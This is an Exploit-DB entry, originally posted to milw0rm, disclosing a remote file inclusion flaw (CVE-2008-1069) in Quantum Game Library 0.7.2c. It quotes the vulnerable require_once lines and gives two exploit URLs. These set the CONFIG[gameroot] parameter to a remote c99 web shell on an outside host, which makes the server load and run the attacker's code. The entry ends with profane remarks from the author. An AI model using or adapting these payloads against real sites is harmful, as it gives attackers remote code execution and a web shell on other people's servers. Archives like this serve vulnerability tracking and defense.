Quantum Game Library 0.7.2c - Remote File Inclusion

Author: RoMaNcYxHaCkEr
type: webapps
platform: php
port: 
date_added: 2008-02-21  
date_updated: 2016-11-14  
verified: 1  
codes: OSVDB-42148;CVE-2008-1069;OSVDB-42147  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comqsgen_0.7.2c.tar.gz  

raw file: 5174.txt  

# Name : Quantum Game Library 0.7.2c Multiple Remote File Include
# Download From : http://garr.dl.sourceforge.net/sourceforge/quantumstar/qsgen_0.7.2c.zip
# Found By : RoMaNcYxHaCkEr     [RoMaNTiC-TeaM]
# Home Page :  WwW.4RxH.CoM
+============================================================================+
# Vulne Code In Files server_request.php & smarty.inc.php In Line 2 & 1 :
require_once($CONFIG['gameroot']."/qlib/config/config.inc.php");
require_once($CONFIG['gameroot']."/qlib/smarty/libs/Smarty.class.php");
# Exploit :
http://www.4rxh.com/qsgen_0.7.2c/server_request.php?CONFIG[gameroot]=http://rxh.freehostia.com/shells/c99in.txt?
http://www.4rxh.com/qsgen_0.7.2c/qlib/smarty.inc.php?CONFIG[gameroot]=http://rxh.freehostia.com/shells/c99in.txt?
That,s It,s
Good Luck Everybody
+============================================================================+
# Greet To :
Tryag TeaM & All Members Of My Forum
# For Contact : RxH@HotMail.iT
# Note : Yesterday I Help You !! Tomorrow Fuck Me !!! Fuck All Snitches !!! But Do You Know What !!! That,s Is My Mistake
Best Wishes

# milw0rm.com [2008-02-22]